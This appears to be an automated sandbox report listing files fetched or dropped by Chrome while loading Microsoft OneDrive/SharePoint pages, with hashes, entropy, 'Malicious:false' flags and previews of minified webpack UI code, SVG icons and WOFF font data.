                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[26],{2721:function(e,t,n){n.d(t,{a:function(){return y}});var a=n("tslib_102"),i=n("react-lib"),r=n("fui.util_369"),o=n(127),s=n(281),c=n(47),d=n(955),l=n(2722),u=n(143),f=function(e){if(void 0===e)return 0;var t=0;return"scrollTop"in e?t=e.scrollTop:"scrollY"in e&&(t=e.scrollY),Math.ceil(t)},p=function(e,t){"scrollTop"in e?e.scrollTop=t:"scrollY"in e&&e.scrollTo(e.scrollX,t)},m=n(142),_=n(282),h={top:-1,bottom:-1,left:-1,right:-1,width:0,height:0},b=function(e){return e.getBoundingClientRect()},g=b,v=b,y=function(e){function t(t){var n=e.call(this,t)||this;return n._root=i.createRef(),n._surface=i.createRef(),n._pageRefs={},n._getDerivedStateFromProps=function(e,t){return e.items!==n.props.items||e.renderCount!==n.props.renderCount||e.startIndex!==n.props.startIndex||e.version!==n.props.version||!t.hasMounted&&n.props.renderEarly&&(0,r.bg)()?(n._resetRequiredWindows(),n._requiredRect=null,n._measureVersion++
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (688)
                                                  Category:downloaded
                                                  Size (bytes):693
                                                  Entropy (8bit):5.255688789874073
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:D9299AC65617637270F167D7DAD85EBE
                                                  SHA1:11C6DDE6071E6DC9835B3FA8ADD9A581DFFF8C26
                                                  SHA-256:B460F7F3DA72CE7B5D9DB5B3EC66A49460C8041CD5804B9B1ECE5F2E22A40D27
                                                  SHA-512:1A025FDCDDE62687CAC4903C76EEE5FAE98743F86BD0358CE0273021977DD9994C64FE98C1CA2E47AA9ACFE73FC539C223039B6EC62CAFFE3BCFB1E460B07A43
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/file-browser-odb-meta-os/232.js
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[232],{2337:(e,t,n)=>{n.r(t),n.d(t,{resourceKey:()=>f});var a=n(112),i=n(72),r=n(260),o=n(1),s=n(13),c=n(1623),d=n(33),l=n(1244),u=n(165),f=new o.a({name:"DropActionControlHandler",factory:new s.a(function(e,t){if((0,d.di)(d.Hh))return{};if(t.handlers&&function(e,t){var n=(0,u.a)(e);if(n&&t.itemKey){var o=(0,l.a)(e,{itemKey:t.itemKey}).itemKey;if(o){var s=a.a.deserialize(o).webAbsoluteUrl;return new r.a({},{pageContext:n}).getUrlParts({webUrl:s}).geoRelation===i.a.crossGeo}}return!1}(e,t)){for(var n=[],o=0,s=t.handlers;o<s.length;o++){var f=s[o];f.key!==c.a.key&&n.push(f)}return{handlers:n}}return{}})})}.}]);
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (4715)
                                                  Category:dropped
                                                  Size (bytes):18996
                                                  Entropy (8bit):5.439119356387553
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:3DB8EE0F990FF31ECEB6F7840F017F67
                                                  SHA1:EE92AB96AF28598C2AF1A591BAA0C5E8B59396AD
                                                  SHA-256:F5C1650D77F0C633AFF821FC9E247BB94F3D21AF8C4C965FA3A9D8EBBB659B3C
                                                  SHA-512:818C4484C97D37D56C9FA216B9471163CB34B40FCB68383FF3318762779512E9076ADB66C408C8D7CAF9506229CFEB03F64D5F2647801BF18A0E8819373763FB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[11],{7821:function(e,t,n){n.d(t,{a:function(){return s}});var a=n(66),i=n(7822),r=n(7820),o=n("odsp.util_460");function s(e){var t,n=e.key,s=n.listFullUrl,c=n.itemId,d=n.rootFolder,l=e.listData,u=l.ListTitle,f=l.ListTemplateType,p=e.pageContext;if(c||d){if(d){var m=(0,r.a)(d,s);m>-1&&(t=d.substring(m+1))}}else t="string"==typeof f&&Number(f)===a.a.mySiteDocumentLibrary?(null==p?void 0:p.isMySiteOwner)||(null==p?void 0:p.isSiteOwner)||!(null==p?void 0:p.webTitle)?i.a:(0,o.OO)(i.b,p.webTitle):u;return t}}.,4096:function(e,t,n){n.d(t,{a:function(){return m},b:function(){return h},c:function(){return _},d:function(){return p},e:function(){return d},f:function(){return u},g:function(){return c},h:function(){return f},i:function(){return l}});var a=n(56),i=n(3518),r=n(1866),o=n(1865),s=n(4095);function c(e){return!!e.RemoteItem}function d(e){return!c(e)&&1===Number(e["Created_x0020_Date.ifnew"])}function l(e){retur
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (12337)
                                                  Category:downloaded
                                                  Size (bytes):14388
                                                  Entropy (8bit):5.270869042619528
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:A2A6739CFBB7BCDB6A0825A167995E57
                                                  SHA1:04BB76BF2384AEEE2511E9ADFB17316F3397CC81
                                                  SHA-256:39ED9F23440FBE03179E723E651F56BB81780D8C52B007D048F9698B1D73EA46
                                                  SHA-512:944E3DD31D25DCDF1DACDCC423A924060DD78051B29E1070024E322870D9276BBEA44AEF054CFF4FA5CA78382AB3AB8A3E5D29C6FB3558034759D95D6295D461
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/166.js
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[166],{4679:function(e,t,n){n.d(t,{a:function(){return a}});var a={public:"Public",private:"Private"};t.b=a}.,3116:function(e,t,n){n.r(t),n.d(t,{createSearchRoot:function(){return o},getItemStatistics:function(){return s},getProperties:function(){return r},getUserFromOwsString:function(){return c}});var a=n(2482),i=n(592);function r(e){for(var t={},n=0,a=e.results;n<a.length;n++){var i=a[n],r=i.Key,o=i.Value;switch(i.ValueType){case"Edm.Boolean":t[r]={false:!1,true:!0}[o];break;case"Edm.Double":t[r]=parseFloat(o);break;case"Edm.Byte":case"Edm.Int32":case"Edm.Int64":t[r]=parseInt(o,10);break;case"Null":t[r]=null;break;case"Edm.String":if("Edges"===r){for(var s=JSON.parse(o),c=0,d=s;c<d.length;c++){var l=d[c];l.Properties.BlobContent&&(l.Properties.BlobContent=JSON.parse(l.Properties.BlobContent.toString()))}t[r]=s}else t[r]=o;break;default:t[r]=o}}return t}function o(e){var t=new a.a(e.key);return t.type=i.a.Fo
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:SVG Scalable Vector Graphics image
                                                  Category:downloaded
                                                  Size (bytes):919
                                                  Entropy (8bit):4.683413542817976
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:1E425F59C3D91508C63BDE68694BA116
                                                  SHA1:3542AE870A3C65D2D467D48EE2E24C463A01C7BA
                                                  SHA-256:2B486C70ADF73B332FE2A363941E24AEE1BEFA7DED7E9D3110D24E8B9B971C98
                                                  SHA-512:23B1DCAE541EF52D31B16BFFE78100E7C02B3A43FBFC85B2C22AA0C56DA478870440C2C69BF472639A2379116082076C81FED8C68F9458E90053C64EA4FD6EAA
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/images/addtoonedrive/shortcutbadge_16_dark.svg
                                                  Preview:<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="16" height="16" rx="3" fill="#292929"/>..<path fill-rule="evenodd" clip-rule="evenodd" d="M4.5 5.125C4.15482 5.125 3.875 4.84518 3.875 4.5C3.875 4.15482 4.15482 3.875 4.5 3.875H11.5C11.8452 3.875 12.125 4.15482 12.125 4.5V11.5C12.125 11.8452 11.8452 12.125 11.5 12.125C11.1548 12.125 10.875 11.8452 10.875 11.5V6.00888L4.94194 11.9419C4.69786 12.186 4.30214 12.186 4.05806 11.9419C3.81398 11.6979 3.81398 11.3021 4.05806 11.0581L9.99112 5.125H4.5Z" fill="#479EF5"/>..<path fill-rule="evenodd" clip-rule="evenodd" d="M13 1.2H3C2.00589 1.2 1.2 2.00589 1.2 3V13C1.2 13.9941 2.00589 14.8 3 14.8H13C13.9941 14.8 14.8 13.9941 14.8 13V3C14.8 2.00589 13.9941 1.2 13 1.2ZM3 0C1.34315 0 0 1.34315 0 3V13C0 14.6569 1.34315 16 3 16H13C14.6569 16 16 14.6569 16 13V3C16 1.34315 14.6569 0 13 0H3Z" fill="#999897"/>..</svg>..
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (8261)
                                                  Category:dropped
                                                  Size (bytes):9299
                                                  Entropy (8bit):5.315596205717209
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:9AAE3DD07997EC89DD451340E2531833
                                                  SHA1:5FDEEEC8C8AA803C2950AC7144B9E77D0A2610D1
                                                  SHA-256:A26C551F29B8DA75091E0AD6D893E973A6587D33B35EDDA29073BB304111FFCB
                                                  SHA-512:E2B72DC069F0BF54EEFA6043BAE3D55E3FAD47F0781F05EF9D22755F5C8CFA64F25014A0BF2923A0F461BC3665311FC904DDA39416BB02D1CDDA3B16357BB7BA
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[437],{4972:function(e,t,n){n.d(t,{a:function(){return k}});var a=n(37),i=n("tslib_102"),r=n("react-lib"),o=n(33),s=n("fui.core_351"),c=n(47),d=n(955),l=n(280),u=n(959),f=(0,o.a)(),p=r.forwardRef(function(e,t){var n=(0,u.a)(void 0,e.id),a=e.items,o=e.columnCount,s=e.onRenderItem,p=e.isSemanticRadio,m=e.ariaPosInSet,_=void 0===m?e.positionInSet:m,h=e.ariaSetSize,b=void 0===h?e.setSize:h,g=e.styles,v=e.doNotContainWithinFocusZone,y=(0,c.h)(e,c.i,v?[]:["onBlur"]),S=f(g,{theme:e.theme}),D=(0,d.e)(a,o),I=r.createElement("table",(0,i.W_)({"aria-posinset":_,"aria-setsize":b,id:n,role:p?"radiogroup":"grid"},y,{className:S.root}),r.createElement("tbody",{role:p?"presentation":"rowgroup"},D.map(function(e,t){return r.createElement("tr",{role:p?"presentation":"row",key:t},e.map(function(e,t){return r.createElement("td",{role:"presentation",key:t+"-cell",className:S.tableCell},s(e,t))}))})));return v?I:r.createElement(l.a
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (65461)
                                                  Category:downloaded
                                                  Size (bytes):182594
                                                  Entropy (8bit):5.473653052092742
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:4CC5A6DFC356D203C1E29099C40A0795
                                                  SHA1:3731F8B740FDE9E05E9DF1587A254182D648EC97
                                                  SHA-256:ED9839377F0DC8762371EF2B39839BDA6959DF82991DA3FD979965D99F54ED3B
                                                  SHA-512:363CA7C4A55DF88CE2342681779264A0398C8805AA6B268A9C01F93B241B700785389680555AD71E5717115F767F93CCBECD81CDB22D44D1023B134DA88C1924
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp.fluentui.core/fui.core-58e89b1d.js
                                                  Preview:/*! For license information please see fui.core-58e89b1d.js.LICENSE.txt */."use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["fui.core"],{"fui.core_351":(e,t,n)=>{n.d(t,{DHS:()=>gs,tzk:()=>fs,var:()=>Cs,_iA:()=>Ei,nl3:()=>Ai,viy:()=>Yr,o2X:()=>Oi,gP_:()=>Ti,LUr:()=>ms,gtT:()=>wi,aDD:()=>Qr,Oa1:()=>Ss,qIe:()=>qr,uJ1:()=>p,YqS:()=>Nr,KuX:()=>or,t6J:()=>sr,hUq:()=>xs,AZ9:()=>Os,c01:()=>it,WxX:()=>$e,qGn:()=>Li,r6K:()=>f,Bfw:()=>u,uTr:()=>l,R0y:()=>bs,iJB:()=>k,mRq:()=>L,$gw:()=>ir,zjq:()=>rr,ttl:()=>Qi,CaY:()=>Yi,dyo:()=>Is,Xf7:()=>we,P87:()=>lo,Kqz:()=>lo,mzW:()=>ws,i1u:()=>Fi,EU_:()=>Hi,TDV:()=>hs,d8B:()=>ls,J5O:()=>ds,KBr:()=>Ds,bkl:()=>_s,Ok$:()=>gi,EWy:()=>Ao,p2S:()=>_i,wpc:()=>Ni,Wl:()=>ki,T_S:()=>ps,L_j:()=>bo,j8X:()=>Mi,iDo:()=>Pi,fXG:()=>Ui,X$8:()=>st,_9Q:()=>ot,t7O:()=>ys,KBT:()=>D,k1S:()=>S,_hP:()=>y,gKr:()=>I,VOd:()=>x,X82:()=>h,KrN:()=>_,mpj:()=>m,OKK:()=>C,EJg:()=>b,PSQ:()=>g,V1H:()=>v,CTe:()=>Me,xYP:()=>Pe,QVF:()=>ei,x5K:()=>yo,JOJ:()=>Si,KZM:()=
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                  Category:downloaded
                                                  Size (bytes):96231
                                                  Entropy (8bit):5.333128461529568
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:296068525EFBA72736DC82C177213E3E
                                                  SHA1:991D64A77EDE233A15ED4CF7C8D98681F06149CA
                                                  SHA-256:32F2D2E02003278B08C6990783D312F289CB5FF3190EB1793CF89553F63A4F27
                                                  SHA-512:201625E1286A38F37998B85F6F8C21712262F4EACCBB90616D07255939CA78C359EB9E1E913576BA46075178C6F6A6844FB5218012E5163B4DFC7700F8E7C951
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/shakaengine.js
                                                  Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[11763],{353069:(e,t,n)=>{n.r(t),n.d(t,{ShakaOnePlayerEngine:()=>Qe,fetchProtectionKey:()=>j,parseContentProtectionData:()=>W});var a=n(295610),i=n(672115),r=n(82999),o=n(538054),s=n(262708),c=n(531344),d=n(695745),l=n(935450),u=n(243044),f=n.n(u),p=void 0,m={error:function(e,t,n){console.error("[".concat(e,"]: ").concat(t," - ").concat(null!=n?n:""))},info:function(e,t,n){console.info("[".concat(e,"]: ").concat(t," - ").concat(null!=n?n:""))},warn:function(e,t,n){console.warn("[".concat(e,"]: ").concat(t," - ").concat(null!=n?n:""))},debug:function(e,t,n){console.debug("[".concat(e,"]: ").concat(t," - ").concat(null!=n?n:""))}},_=function(e){var t;return null!==(t=null==p?void 0:p(e))&&void 0!==t?t:m},h=_("utils");function b(e,t){if(void 0===t&&(t="int"),void 0===e||"number"==typeof e)return e;if("string"==typeof e)switch(t){case"int":return parseInt(e,10)||void 0;case"float":return parseFlo
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (29435)
                                                  Category:dropped
                                                  Size (bytes):35472
                                                  Entropy (8bit):5.324623793525526
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:7E082CE7BEF65984C421DECDEF07E0DD
                                                  SHA1:9C3B0A07D8DA5AB71592B7E3D71848185EEED534
                                                  SHA-256:E2A9B5DE6AA5AAABD68D946496CCAFC958AF80BB593B584520FBDD84C69B0C03
                                                  SHA-512:50B3427B1BCAC184CFC7F554924645313E35125110B70666E3B4BE2E507C4A513760781D4F73BE74BE2B6E690D351BE206B181FA5340AF77F9C5F1C7AEBC871B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[47],{7934:function(e,t,n){n.d(t,{a:function(){return F},b:function(){return H}});var a=n("tslib_102"),i=n(3274),r=n(222),o=n(499),s=n(888),c=n(2810),d=n(4144),l=n(3276),u=n(3277),f=n(3199),p=n(2892),m=n(3120),_=n(3278),h=n(3541),b=n(3279),g=n(326),v=n(265),y=n(3815),S=n(2786),D=n(53),I=n(1762),x=n("odsp.util_460"),C=n(1775),O=n(3198),w=n(269),E=n(3119),A=!x.HW.isActivated("48d0bf6b-2e41-42a8-a3a3-e8d2ef405dbb","7/14/2022","better error handling"),L=x.HW.isActivated("3e85cd31-2807-44c1-96bf-35f08619ec11","1/31/2023","Fix for not appending navId to SPL link"),k=x.HW.isActivated("edb05947-5f5b-47a0-91ef-ddc0cef4e7a1","07/03/2024","sbarrameda: fix to use loginName if userId is undefined"),M=x.HW.isActivated("46a06a91-966f-47f1-af68-09d8b3864e12","07/03/2023","Override navId with navIdSendLinkOverride")||x.IT.isFeatureEnabled({ECS:1107386}),P=x.HW.isActivated("62a4337e-d21e-407b-b2ef-2163777d20b8","12/19/2022","Li
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (6639)
                                                  Category:downloaded
                                                  Size (bytes):16774
                                                  Entropy (8bit):5.192657266374084
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:4AAE19284B529E582FE2888122F8651B
                                                  SHA1:5D08DFA7B68E9137895A1392032298AE2657A146
                                                  SHA-256:810D2E3102C1A511F16BC421E7C0C4B71AABC8F187FBDD56ECF6FDB3E4B91831
                                                  SHA-512:305ECC9C87C8B6DAF30F5BA8662CB94044FD8763533DD3064982FBB9636C20FC419925D5BFEAB4D3F636E5BF6D4E0E8FB3E050D483134501542D329ECDEC77F5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/37323.js
                                                  Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[37323],{370100:(e,t,n)=>{n.d(t,{C:()=>o});var a,i=n(295610),r=n(315301),o=(a=Error,(0,i.__extends)(function e(t,n){var i=a.call(this,n&&n.length>0?"".concat(n,": ").concat((0,r.o)(t)):(0,r.o)(t))||this;return i.error=t,void 0!==typeof Object.setPrototypeOf&&Object.setPrototypeOf(i,e.prototype),i},a),function(){function e(e,t,n,a,i,r,o,s,c,d,l,u,f){this.name=e,this.message=t,this.stack=n,this.staticMessage=a,this.isExpected=i,this.statusCode=r,this.clientRequestId=o,this.requestId=s,this.oData=c,this.correlationId=d,this.retryCount=l,this.responseJson=u,this.responseText=f}return e.isServiceError=function(t){return t instanceof e},e}())}.,538054:(e,t,n)=>{n.d(t,{E0:()=>f,dt:()=>m,f9:()=>h,sM:()=>p});var a=n(295610),i=n(188830),r=n(322208),o=n(523499),s=n(315301),c=n(370100),d=n(246477),l=n(485942),u=(0,i.Yc)("Unsupported browser");function f(e){if(e instanceof Error)return(0,l.Z)(e.message)&&
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:SVG Scalable Vector Graphics image
                                                  Category:downloaded
                                                  Size (bytes):682
                                                  Entropy (8bit):4.849297734990448
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:EB9B9836D41E761A94DE4C9A48780F28
                                                  SHA1:275F09F5F87854676CDDEF033D99B5B0371FB51D
                                                  SHA-256:3D2C1F9C959C97C75F339FF4C109D08B943B1197CC7F4B0F7CC587BFAE2FA603
                                                  SHA-512:EBE94F9372E8FEDC93DA7D070E4F6113D9D0F6DD6DB8A71C1A55326FA9F11A4FF8AFAE9CEF1EA7A5FFE8D9EB5FC727C70D1B4A3C7A7172CA8FC3F22B1C4F6FD8
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/images/addtoonedrive/shortcutbadge_16.svg
                                                  Preview:<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="16" height="16" rx="3.5" fill="white"/>..<path fill-rule="evenodd" clip-rule="evenodd" d="M4.5 5.125C4.15482 5.125 3.875 4.84518 3.875 4.5C3.875 4.15482 4.15482 3.875 4.5 3.875H11.5C11.8452 3.875 12.125 4.15482 12.125 4.5V11.5C12.125 11.8452 11.8452 12.125 11.5 12.125C11.1548 12.125 10.875 11.8452 10.875 11.5V6.00888L4.94194 11.9419C4.69786 12.186 4.30214 12.186 4.05806 11.9419C3.81398 11.6979 3.81398 11.3021 4.05806 11.0581L9.99112 5.125H4.5Z" fill="#0F6CBD"/>..<rect x="0.6" y="0.6" width="14.8" height="14.8" rx="2.9" stroke="#979695" stroke-width="1.2"/>..</svg>..
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Web Open Font Format, TrueType, length 17344, version 1.3277
                                                  Category:downloaded
                                                  Size (bytes):17344
                                                  Entropy (8bit):7.980079760537076
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:FCE8442EF250EB3F61CAB5822C02C9CF
                                                  SHA1:BF5C297C1E0A8A05DAEDE1039833519B8F930F93
                                                  SHA-256:FF7BC10AC17B93C189E93CFB6A63DA9868850FDCB0A8CE39B3348E68B21C765D
                                                  SHA-512:5525044B4D0A1A586DFAD745859F99838FBF5C3B03094FD269915AF100BA46F894103974BC1F0B2F050115DEE63F9F18CB5CEB08594198EDC411544D40B2216C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/fluenthybridfont/odsp-next-icons-7-29f3d857.woff
                                                  Preview:wOFF......C.................................OS/2.......G...`0.i.cmap...P...........gasp................glyf......;...t.D...head..>|...5...6#.hhea..>........$....hmtx..>....T........loca..?$.........+.Rmaxp..?........ .w.4name..@........O..R.post..C........ ....x.c`a..8...........L..t.!.I.(......@9......VP`px.......`u,......7..>.x...KH.P...;f..X4.%.4ER(..(|TcM..........rS.VIP.+q.&..E.ED.A..R.H.......-.B$..(..\.{...g....VN..|w..>..91.....%..T.U.....V.jU....z].e].U]S...tS-jS.n.:.^=.c..F4.1..4.Y.i^_.M..._Z._.n;l......Y..,.r-..X..Z....v....X.jb1....t.^w+.{..._..\....k.D.K....5]I\....U.b...;..3..d..t.(K|.=.x.o..W..9C,..=.3..v.h.....H..<..{Ts.(w.p.S...b.q.B..'..*.".R28.^.SB2..Mrp...........H.j...?c1.,...............x....|..8>...J.-{.:l].a.|;.,./.J.$.s.v....;.9 .B6......J.QJ.p....6....m......+-.........%m.sh%.H8.K,......w..g..p....e..<.P...W.j.M........ec......... ../..X..<..}AX...mL..Z.#m0T.f..j....F....j1..R...B........gd,f.M...,.O...._....EK.........
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Web Open Font Format, TrueType, length 14648, version 1.3277
                                                  Category:downloaded
                                                  Size (bytes):14648
                                                  Entropy (8bit):7.973475164932208
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:A51C6902C29A33977D436D63C099BF53
                                                  SHA1:9B682DA18D85EDB44A5859684A31FCA302FB8C49
                                                  SHA-256:3E86A5B77AB4E1E7153FECD2B9FB7345BDFCF8CC5CAB4D74311ED9D9AE28C0C3
                                                  SHA-512:BD54F46D9194C7710709F2BA01955DBDE065BA840187AE254AF7CB54C29625894DDBFD819983FC72FC02EFBAB805442510B08CBC95120515E2F894636DF91710
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/fluenthybridfont/odsp-next-icons-18-9c592bf0.woff
                                                  Preview:wOFF......98......l`........................OS/2.......G...`=.t.cmap...P.......r?.9.gasp...H............glyf...T..1...]<..Y.head..4....2...6#...hhea..48.......$....hmtx..4T...F........loca..4.............maxp..5h....... .|..name..5........O..R.post..9$....... ....x.c`a..8...........L..t.!.I.(......@9......VP`p...-.....`u,......=..n.x...?KBa....b..i.r....)..h..Z..,.."G.3.-...Qc4;.B.(.....tx.m..K........7....d...-.b.......$#...8..2...,p..,.%..e....#...Wv..'.......MM..i.h^.Z.}.@....T..x.G.a..Sq....9+..>~..o........x.....J.D..j.A..@.../B.o!.....N...o.6fi..e..................x..|{|...9.lY..iK.dI.d;...e9.c..8......< .@B..<I.....-)[......K...n[.)..k...u...[.{........&......k...&....s.|.....iB.C.m.'2!T.+bX.....~Qa..-....4."!"|O,x[3.B....Yg$............LO.+.....F...hD..L...+.4....[..`+@.4......Y......$.........!..Xv.+..U..H.oI...*U_{...:.%}..i..qE.~J...z...u...pV..c.._i.~.cm._........[..o..4R.#\.CI.oi...ui_..44.x..|Q.......d.......MW..}./.`s..c.X7...!.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (2747)
                                                  Category:dropped
                                                  Size (bytes):2752
                                                  Entropy (8bit):4.801824661152622
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:7D26A2DE5494068D36F7FD59BF4E18DC
                                                  SHA1:8F7BFD70D71BB8886CC48A905407F76F128692AC
                                                  SHA-256:30F64CB1C94B2EC2EFEB639D4A32F125794A477B160F7C52FDFA2DA53C5CD409
                                                  SHA-512:56DA1FB10C9665DBE3550F78C20B8A80F4E70688D808F8F4B2F0795218292252A68D6A6AC847F98F87AF0130AEC1804C9831BFC5A89292EF0129F0EAAAAF2EF3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[17],{8123:function(e,t,n){n.d(t,{a:function(){return r},b:function(){return i},c:function(){return o},d:function(){return s},e:function(){return c},f:function(){return d},g:function(){return l},h:function(){return u},i:function(){return m},j:function(){return f},k:function(){return p}});var a=n(2490);const i=(0,a.a)("CheckmarkFilled","1em",["M7.03 13.9 3.56 10a.75.75 0 0 0-1.12 1l4 4.5c.29.32.79.34 1.09.03l10.5-10.5a.75.75 0 0 0-1.06-1.06l-9.94 9.94Z"]),r=(0,a.a)("CheckmarkCircleFilled","1em",["M10 2a8 8 0 1 1 0 16 8 8 0 0 1 0-16Zm3.36 5.65a.5.5 0 0 0-.64-.06l-.07.06L9 11.3 7.35 9.65l-.07-.06a.5.5 0 0 0-.7.7l.07.07 2 2 .07.06c.17.11.4.11.56 0l.07-.06 4-4 .07-.08a.5.5 0 0 0-.06-.63Z"]),o=(0,a.a)("ChevronDownRegular","1em",["M15.85 7.65c.2.2.2.5 0 .7l-5.46 5.49a.55.55 0 0 1-.78 0L4.15 8.35a.5.5 0 1 1 .7-.7L10 12.8l5.15-5.16c.2-.2.5-.2.7 0Z"]),s=(0,a.a)("ChevronLeftFilled","1em",["M12.27 15.8a.75.75 0 0 1-1.06-.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (5178)
                                                  Category:downloaded
                                                  Size (bytes):9994
                                                  Entropy (8bit):5.218000695096243
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:F0F37661A3029D96E04C2729AB1ECA3B
                                                  SHA1:C2C71607E73FAC854F43EDFA6FF0D77F824741E8
                                                  SHA-256:3A06008DD64B4A3EFA89355F3C79B635BEA0A5E69F0CE7BAF8AAA5B5B390C440
                                                  SHA-512:664C6D0193B5B2D60960FC629C2C7A3E2E755A38061BD594C4B00EF9A38EDE39A4C0411BA1ABCCF3CADC1CBC68730767D35199FED3E8DF7C41359BD0E957984F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/90978.js
                                                  Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[90978],{426937:(e,t,n)=>{n.d(t,{a:()=>m});var a=n(295610),i=n(408156),r=n(367478),o=n(249127),s=n(967625),c=n(887602),d=n(517875),l=n(926510),u=n(793021),f=n(733220),p=(0,d.NF)(function(e,t,n){var i=(0,l.W)(e),r=(0,u.W)(e),o={root:{minWidth:"80px",height:"32px"},label:{fontWeight:c.uq.semibold}};return(0,c.L$)(i,o,n?function(e){var t,n,i,r,o,s,d,l,u,p=e.palette,m=e.semanticColors;return{root:{backgroundColor:m.primaryButtonBackground,border:"1px solid ".concat(m.primaryButtonBackground),color:m.primaryButtonText,selectors:(t={},t[c.hJ]=(0,a.__assign)({color:"Window",backgroundColor:"WindowText",borderColor:"WindowText"},(0,c.IM)()),t[".".concat(f.M$," &:focus")]={selectors:{":after":{border:"none",outlineColor:p.white}}},t)},rootHovered:{backgroundColor:m.primaryButtonBackgroundHovered,border:"1px solid ".concat(m.primaryButtonBackgroundHovered),color:m.primaryButtonTextHovered,selectors:(n=
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (10451)
                                                  Category:dropped
                                                  Size (bytes):15727
                                                  Entropy (8bit):5.2372360674370135
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:680B62004CB6E91A48C08F1DBFA466D1
                                                  SHA1:515269C7BBEEC6B3AA43D593FF3DCFF76BE0AE2C
                                                  SHA-256:AF34FF482AEF3988E7E7E46E21DCD5173B57D66181B3326236D7AA9467200B0D
                                                  SHA-512:2F6CF3CAB20858B01FBBDAD6FD3F9F01B57BB2EE71C71866EAC711ADD47BE4CCA2CCF2981AE6CE7954BF68D67ED8AC3D1F10784F0CF3B4C4B77B08FB5090EDCF
                                                  Malicious:false
                                                  Reputation:unknown
